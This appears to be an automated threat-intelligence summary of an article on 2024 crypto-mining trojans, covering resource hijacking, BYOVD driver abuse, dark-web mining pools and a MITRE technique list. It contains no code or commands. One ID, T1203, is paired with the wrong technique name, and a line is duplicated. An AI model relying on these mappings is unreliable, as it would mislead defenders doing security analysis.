The article discusses the various threats posed by mining trojans that infiltrate victims’ computers, utilizing their resources for illegal cryptocurrency mining without their consent. It highlights the negative impacts on system performance, increased risk of failure, and potential for creating backdoors leading to further cyberattacks. The trend towards the use of sophisticated techniques like BYOVD attacks and the rise of dark web mining pools is emphasized. Various mining organizations that have been active in 2024 are also identified.
Affected: Cryptocurrency mining organizations, operating systems (Windows, Linux), cloud servers, economic sectors.
Affected: Cryptocurrency mining organizations, operating systems (Windows, Linux), cloud servers, economic sectors.
Keypoints :
- Mining trojans exploit victims’ resources for illegal profits without their knowledge.
- Increased resource consumption leads to system slowdowns and potential service crashes.
- Deployment of backdoors to create botnets for further attacks.
- Use of BYOVD attacks has increased, bypassing security software through legitimate drivers with vulnerabilities.
- Emergence of dark web mining pools for more discreet mining activities.
- Intelligent resource allocation strategies in mining malware make detection harder for users.
- Various mining malware organizations are detailed, including their strategies and target platforms.
MITRE Techniques :
- T1075: Pass the Hash – Mining trojans may exploit credentials to gain access and control over systems.
- T1069: Permission Groups Discovery – Use of this technique to leverage group permissions for more effective mining.
- T1086: PowerShell – Malicious PowerShell scripts are commonly used to download and execute mining software.
- T1203: Exploit Public-Facing Application – Mining trojans take advantage of known vulnerabilities in software like WebLogic and Redis.
- T1055: Process Injection – Some mining trojans employ process injection to hide their activity and evade detection.
Indicator of Compromise :
- No IoC Found
Full Story: https://www.4hou.com/posts/gyyj